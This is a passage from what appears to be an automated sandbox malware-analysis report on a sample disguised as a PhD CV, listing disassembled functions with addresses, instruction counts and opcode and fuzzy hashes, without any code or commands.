                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                                  • Instruction ID: e49d2cca2a599c6ab37a2ba48e8b260d980d2432c9e02d64d0cebe73c2fe1735
                                                                                                  • Opcode Fuzzy Hash: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                                  • Instruction Fuzzy Hash: 42F19D71E006199BCF18DFA5C980BAEBBF5BF89710F048169E815AB345E774EC41EB60
                                                                                                  Function 00FD84BB Relevance: .4, Instructions: 386COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b3777e325975cbf0dc3be221e9e9f41a4f967ef05d34776798ce84b2a1825760
                                                                                                  • Instruction ID: 75e0643ad59c685b6d5cb701233d232fe83819dec3bd7a41f1cdc30ccdb8d69e
                                                                                                  • Opcode Fuzzy Hash: b3777e325975cbf0dc3be221e9e9f41a4f967ef05d34776798ce84b2a1825760
                                                                                                  • Instruction Fuzzy Hash: 0CD1E372E006199BDB15CF58C841BFEB7F2AF84354F2D816AD815E7340DB35E906AB50
                                                                                                  Function 00F464F0 Relevance: .4, Instructions: 383COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 501ff6b0db8f8b1faaa339b89a1bd31c7cd2368f494c8da7e83130e62cc25c9b
                                                                                                  • Instruction ID: 53a6793c1aedf59a7fbaaa10d85a9619f8dcc79d252e5c1afedf44387e85cac3
                                                                                                  • Opcode Fuzzy Hash: 501ff6b0db8f8b1faaa339b89a1bd31c7cd2368f494c8da7e83130e62cc25c9b
                                                                                                  • Instruction Fuzzy Hash: 30E18C719083418FC714CF28C490A6ABBE0FF9A314F158A6DF999DB351EB31E905DB92
                                                                                                  Function 00F38347 Relevance: .4, Instructions: 380COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 884a7d2771460902d6d084a629c63a17c442d3e987bfa281cf5c1234b6098d21
                                                                                                  • Instruction ID: baaa349483787563a490f13ae5764aee4fd5a4558e686d56a5078b43ee6a394d
                                                                                                  • Opcode Fuzzy Hash: 884a7d2771460902d6d084a629c63a17c442d3e987bfa281cf5c1234b6098d21
                                                                                                  • Instruction Fuzzy Hash: A2D1E072A003069BDF14DF69CD81BBA73B6BF44364F244129F816DB281EB38D946EB50
                                                                                                  Function 00FD69B0 Relevance: .4, Instructions: 379COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c1bd080954b5d838abb318e4db773643807ca5feb01fa971dbc21ff4efb60cf0
                                                                                                  • Instruction ID: bd4d1603639432c343a9b2f877ae0bb2a911c0b2c336f1e40417432669451ffa
                                                                                                  • Opcode Fuzzy Hash: c1bd080954b5d838abb318e4db773643807ca5feb01fa971dbc21ff4efb60cf0
                                                                                                  • Instruction Fuzzy Hash: 95E14C70E002599BCF14CFA8D990AAEBBF6BF59314F18815AE844EB341E335DD45DBA0
                                                                                                  Function 00F50445 Relevance: .3, Instructions: 300COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                  • Instruction ID: 9637e8db5483a7eb1770285eecb8148497f785494fce8e67b7c0f3ded59a206b
                                                                                                  • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                  • Instruction Fuzzy Hash: 69B14772A006059FDB25CF64C890BBEBBF6BF85311F240168EA52DB281DB74ED45EB50
                                                                                                  Function 00F482E0 Relevance: .3, Instructions: 281COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: da9a268db7c12bc5c686d5e1760951cad988cec74a7c6e001bdddb997321b828
                                                                                                  • Instruction ID: 12909d420be252d4da4e2a012db469ea683968c93f50b797f81518c155a7ca98
                                                                                                  • Opcode Fuzzy Hash: da9a268db7c12bc5c686d5e1760951cad988cec74a7c6e001bdddb997321b828
                                                                                                  • Instruction Fuzzy Hash: 71C167746083818FD764CF18C894BABBBE4BF88354F44492DE98987291DB74E909DF92
                                                                                                  Function 00F3C3C7 Relevance: .3, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3ce056bfdc0136064de3bcd8f4e7646553f319fba3945468c76983ad1e78cba
                                                                                                  • Instruction ID: eab4579b14e10c3734d66b0b1aad6805a9343076c8a7fe3dd9fdeb466fe85825
                                                                                                  • Opcode Fuzzy Hash: a3ce056bfdc0136064de3bcd8f4e7646553f319fba3945468c76983ad1e78cba
                                                                                                  • Instruction Fuzzy Hash: 83B1A270A002658BDB74DF58CC90BB9B3B5EF44720F0485EAE44AE7281EB74AD85DF60
                                                                                                  Function 00F6E507 Relevance: .3, Instructions: 278COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cafeeb6caf15c83a3e233e856d1454ea9be555d5478bcc68c56af7b571f6364
                                                                                                  • Instruction ID: 8d7a07094c6f95bdf37b970108f780a8b13b1d9ae9f676eb0d64ca6e75372b9a
                                                                                                  • Opcode Fuzzy Hash: 7cafeeb6caf15c83a3e233e856d1454ea9be555d5478bcc68c56af7b571f6364
                                                                                                  • Instruction Fuzzy Hash: 2FA12872E00215AFDB21DBA8CC48BEEB7B4AF05728F154125E911AF2D1D7789D08EBC1
                                                                                                  Function 00F800A5 Relevance: .3, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 593cd3f27aa4bcaf2e280d90825016b9a1d653375600af9873f19a6bff881d3c
                                                                                                  • Instruction ID: da51a7a90ab53f18d2fc90ce53b55100bd67d69d34cc3d5c3eda93180d4ce69d
                                                                                                  • Opcode Fuzzy Hash: 593cd3f27aa4bcaf2e280d90825016b9a1d653375600af9873f19a6bff881d3c
                                                                                                  • Instruction Fuzzy Hash: AEA1F171B00606DFDB64EF65C881BEAB7B5FF44324F904029EA0997281DF78AC05EB80
                                                                                                  Function 01014080 Relevance: .3, Instructions: 275COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f65a5d3e11cc982dad19e28387fcc1210620ecf41a9425afb54502afddac1ca
                                                                                                  • Instruction ID: f4c3c0e6dffc032ccad0c307009d69b677166560e19273981f1d89b08c7997fe
                                                                                                  • Opcode Fuzzy Hash: 2f65a5d3e11cc982dad19e28387fcc1210620ecf41a9425afb54502afddac1ca
                                                                                                  • Instruction Fuzzy Hash: 8CA1EE72604601EFC722DF18C981B6ABBE9FF48704F444668F685DB666C738ED41CB90
                                                                                                  Function 00F5E310 Relevance: .3, Instructions: 261COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e7c8f37f0e60cf4413d84ed92f4a155938613243fe7204cb3129df191ae509d0
                                                                                                  • Instruction ID: d846b529a3b135c8c4993b8fd90982a2356f7dae51b3660016eff4fe083c4854
                                                                                                  • Opcode Fuzzy Hash: e7c8f37f0e60cf4413d84ed92f4a155938613243fe7204cb3129df191ae509d0
                                                                                                  • Instruction Fuzzy Hash: B2917776E04620CBDB28DB28C880B7E77B5EF85722F15406AEE059B381D6389E05F761
                                                                                                  Function 00F9693A Relevance: .2, Instructions: 226COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3333504dfd058f5d0a78b005f84f7259473ae11bb90e3c5a381dee494a0a1be9
                                                                                                  • Instruction ID: edf4f8ea0000861ad58983cec80e939657a3b6b87cf0dd7ebd1328d880e657fe
                                                                                                  • Opcode Fuzzy Hash: 3333504dfd058f5d0a78b005f84f7259473ae11bb90e3c5a381dee494a0a1be9
                                                                                                  • Instruction Fuzzy Hash: 5E8181B1E006199EEF14CF69C840ABEBBF9FB48714F10842EE455E7640E734E945DB94
                                                                                                  Function 0100A6C0 Relevance: .2, Instructions: 222COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                  • Instruction ID: 211d1c0855f62b328e58a98319ea39d1ce3eda5fb6cc56502cf78330762f9564
                                                                                                  • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                  • Instruction Fuzzy Hash: 82816135B00706DBEF5ACF58C880AAEB7F2BF84310F1581A9D95A9B385D774DA01CB50
                                                                                                  Function 00F36CC0 Relevance: .2, Instructions: 216COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bafa289e8673f1646d4acc33d28cc091d2640344f6b597f7ef80722337a60f2f
                                                                                                  • Instruction ID: ead2d77ff5e9a83406c98adfc7fad8f788bde5bdf14789bb86f7f3407c9f3d0e
                                                                                                  • Opcode Fuzzy Hash: bafa289e8673f1646d4acc33d28cc091d2640344f6b597f7ef80722337a60f2f
                                                                                                  • Instruction Fuzzy Hash: F7719272A086029BEF21DF59C881B6AB7E4FB84360F16492EF955C7200D774ED40EB92
                                                                                                  Function 00F7E1A4 Relevance: .2, Instructions: 212COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ea3117f5f7e6427d1aec44eb965dc1e65ebefb2a1669aa7711721fb1322b55c8
                                                                                                  • Instruction ID: f933101ea5b3adad849e055f0a5353c4ecfa80c69d755bb340bff0995df317d1
                                                                                                  • Opcode Fuzzy Hash: ea3117f5f7e6427d1aec44eb965dc1e65ebefb2a1669aa7711721fb1322b55c8
                                                                                                  • Instruction Fuzzy Hash: 91815F71A00609EFDB15DFA5C880BEEB7F9FF88354F10842AE559A7250DB30AD45EB60
                                                                                                  Function 00FD88FB Relevance: .2, Instructions: 206COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4fc5f7609d99e541f0b984742f98ecc596d16ef2ce482451fb0565cd9f7cb7fc
                                                                                                  • Instruction ID: 95dd376f152a313798bf57f204f5033275295a9e2e90156ac1510add6c8fccd3
                                                                                                  • Opcode Fuzzy Hash: 4fc5f7609d99e541f0b984742f98ecc596d16ef2ce482451fb0565cd9f7cb7fc
                                                                                                  • Instruction Fuzzy Hash: 1071D270904266AFCB14DF59C850AFEBBF6EF45340F48805AE894DB301E739EA46D7A1
                                                                                                  Function 00F5252B Relevance: .2, Instructions: 201COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 85137f9d6d093fc02f96d700ef283b88e37fb6c2ed317052aaf8e4e526aae4c5
                                                                                                  • Instruction ID: 2b838a9b8368d027270da277c9d60edb7df6b26663fd2b5b7e828cf3f1418cb2
                                                                                                  • Opcode Fuzzy Hash: 85137f9d6d093fc02f96d700ef283b88e37fb6c2ed317052aaf8e4e526aae4c5
                                                                                                  • Instruction Fuzzy Hash: 6971F232A042418FC351DF28C880B26B7E4FF85711F0886A9F959CB352EB38DD49DB91
                                                                                                  Function 00F489C0 Relevance: .2, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 44dedb92dbe95ce3ccd6b5ea090fda58a7bc6ddfc651486003ac25bd0e3a7deb
                                                                                                  • Instruction ID: 3dcb4a17bb51bb3e579a3e155878b6026868ca8c995cd2de10fec7c5a8628f20
                                                                                                  • Opcode Fuzzy Hash: 44dedb92dbe95ce3ccd6b5ea090fda58a7bc6ddfc651486003ac25bd0e3a7deb
                                                                                                  • Instruction Fuzzy Hash: 8B81A172F04305DFCB24CF58D584BAEBBB5BF45320F19412AE900AB295DBB99D41EB90
                                                                                                  Function 00F7CCD1 Relevance: .2, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d71536b982ff2f30731d6c3ae34072e51e243d56ef5e0e63eeb2c26ba8f86fb7
                                                                                                  • Instruction ID: 5266644269713eb572233435d319d03cc37f5e8fb0d49b17723b0323933af1b2
                                                                                                  • Opcode Fuzzy Hash: d71536b982ff2f30731d6c3ae34072e51e243d56ef5e0e63eeb2c26ba8f86fb7
                                                                                                  • Instruction Fuzzy Hash: 9161A171E002059FCB18DF69C881BAEB7B9BF49354F20816EE515EB291DB34D902EF91
                                                                                                  Function 01008BBE Relevance: .2, Instructions: 186COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 47eab87d47ce8be864b56e4b030084784d808add0acaeca653143422634e689e
                                                                                                  • Instruction ID: dc8357e42f606bc2d68cd9e5b446d3ffc88c9c78228918f27b29f19b4b7883a5
                                                                                                  • Opcode Fuzzy Hash: 47eab87d47ce8be864b56e4b030084784d808add0acaeca653143422634e689e
                                                                                                  • Instruction Fuzzy Hash: 7361E371600716AFE716DF28C884BABBBE9FF44740F00861AF99987281DB30E914CB91
                                                                                                  Function 00F6ECF3 Relevance: .2, Instructions: 166COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9252d73b967d95013880c54df05bc1f1d877d5414e08bc3eb863272dc5ad10e8
                                                                                                  • Instruction ID: 0ed9245cf6e208fba6254552d1e683ba926016a9d2c810a5293010bb0864731d
                                                                                                  • Opcode Fuzzy Hash: 9252d73b967d95013880c54df05bc1f1d877d5414e08bc3eb863272dc5ad10e8
                                                                                                  • Instruction Fuzzy Hash: 7A51B076600704EFDB30DF5AC884B6AB7E9FB55329F10092DE54287512C779E988EB40
                                                                                                  Function 0100892E Relevance: .2, Instructions: 162COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f15d9e83cf5f5a4f114b0809e8cc4e6bc0c53187afd1cc672d6a29f42116c9cd
                                                                                                  • Instruction ID: 393d30ea803538c670cdcc19da75ef2f0466a005352eb9732e3c548447037de1
                                                                                                  • Opcode Fuzzy Hash: f15d9e83cf5f5a4f114b0809e8cc4e6bc0c53187afd1cc672d6a29f42116c9cd
                                                                                                  • Instruction Fuzzy Hash: 0751B071A047029FE716DF18C840BAAB7E5FF84354F04892AF9D5972D1DB34E948CB92
                                                                                                  Function 00F7E363 Relevance: .2, Instructions: 158COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8834bb80d90fddf723b0310b204ac1b96faf62de69e2f70b79f99907f08c1cad
                                                                                                  • Instruction ID: 4515e861984a53b7fd1e09645d547c709c01cc9fdba69b88876b2394ec7ffda6
                                                                                                  • Opcode Fuzzy Hash: 8834bb80d90fddf723b0310b204ac1b96faf62de69e2f70b79f99907f08c1cad
                                                                                                  • Instruction Fuzzy Hash: 1D516E32600A05EFCB21EF68C990EAAB3FDFF48790F00446AE65597261D738ED45EB51
                                                                                                  Function 00F644D1 Relevance: .2, Instructions: 156COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                  • Instruction ID: b52d3cc6411a3555a0a0d44cf23f6a0690761bdd4fb437282ff19e71b448a27f
                                                                                                  • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                  • Instruction Fuzzy Hash: FA51E571E0021AABCF11EF94C851BEEBBB9EF49714F044069E901AB341DB35ED44EBA0
                                                                                                  Function 00FCE660 Relevance: .2, Instructions: 154COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                                  • Instruction ID: 460b1139aed265ef73f9755557e4edd14c161f34912cba3568fc555f1061c512
                                                                                                  • Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                                  • Instruction Fuzzy Hash: FD51A836D0021AEFDF209B90CE86FAEB7B9AF00724F15466DE92167191D7749E40F790
                                                                                                  Function 0100CDEB Relevance: .2, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                                  • Instruction ID: 2a984a0b409ec6c99c31b5b3c61cb086beca7cf3611489064c06764a397e0675
                                                                                                  • Opcode Fuzzy Hash: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                                  • Instruction Fuzzy Hash: C4517D712083429FE711CF68C980B6ABBE5FFC8344F048AADF99597280D734E905CB92
                                                                                                  Function 010086A8 Relevance: .2, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e0baea96dc4e34667d7b596b1912208b4d1d4699d368e1ff31d3ee8991df70ac
                                                                                                  • Instruction ID: ea735271664a3213f177c9d1337beb38c395374aaedfb8fdfa48479c55a60d2e
                                                                                                  • Opcode Fuzzy Hash: e0baea96dc4e34667d7b596b1912208b4d1d4699d368e1ff31d3ee8991df70ac
                                                                                                  • Instruction Fuzzy Hash: 39412330B006119BF66BDA2DC894B7BBBDAFF80660F04C25AE999872C5DB34D910C791
                                                                                                  Function 00FD2CD0 Relevance: .1, Instructions: 149COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f3c1da2db0534af28c66744c11c4da5d50b8a78c5dd875ad7ab372ad3420f083
                                                                                                  • Instruction ID: d68a5c80e7b86ca5176317701d0948b9dbb27596d08993dbf54df8c723bc5464
                                                                                                  • Opcode Fuzzy Hash: f3c1da2db0534af28c66744c11c4da5d50b8a78c5dd875ad7ab372ad3420f083
